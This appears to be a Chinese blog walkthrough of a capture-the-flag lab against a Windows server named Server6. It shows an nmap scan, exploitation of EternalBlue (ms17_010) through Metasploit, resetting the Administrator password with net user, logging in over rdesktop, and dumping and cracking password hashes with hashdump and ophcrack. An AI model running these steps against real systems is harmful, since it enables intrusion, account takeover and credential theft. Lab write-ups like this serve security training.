Windows操作系统渗透测试

*任务说明:仅能获取Server6的IP地址

  1. 通过本地PC中渗透测试平台Kali对服务器场景Server6进行系统服务及版本扫描渗透测试,并将该操作显示结果中21端口对应的服务状态信息字符串作为Flag值提交;、                          map -sV -sS  靶机ip
  2. 将首选DNS服务器地址作为Flag值提交;首先看靶机开放的端口

 可以看到靶机开启了445端口

开启msfconsole找到永恒之蓝(ms17_010)漏洞模快

Search ms17_010

利用第二个

Use 2(使用)

Show options(查看配置参数)

设置被攻击机ip

Set rhosts 靶机ip

exploit进行攻击

攻击成功后进行shell连接(连接后会显示乱码,利用命令chcp 437 )

net user查看用户

net user Administrator 123456 为用户更改密码以便远程连接

 设置完毕后退出,开启远程桌面命令

另外开启一个命令行远程连接 rdesktop ip -u 用户名 -p 密码

 

 

 

进入后cmd打开命令行 ipconfig /all

找到dns

3.找到Flag1作为Flag值提交;

dir find  Flag1

4.找到Flag2作为Flag值提交;

同上

5.将系统最高权限管理员账户的密码作为Flag值提交。

hashdump获取当前用户密码哈希值

 将得到的管理员的hash值,导入到ophcrack(彩虹表)进行破解

打开密码攻击打开ophcrack

点击Load 点击Single hash 粘贴哈希值

点击Tables 选择free small 点击install 选择root 找到自己的123文件点击OK

点击OK 后点击Crack进行破

 

  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

.摘星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值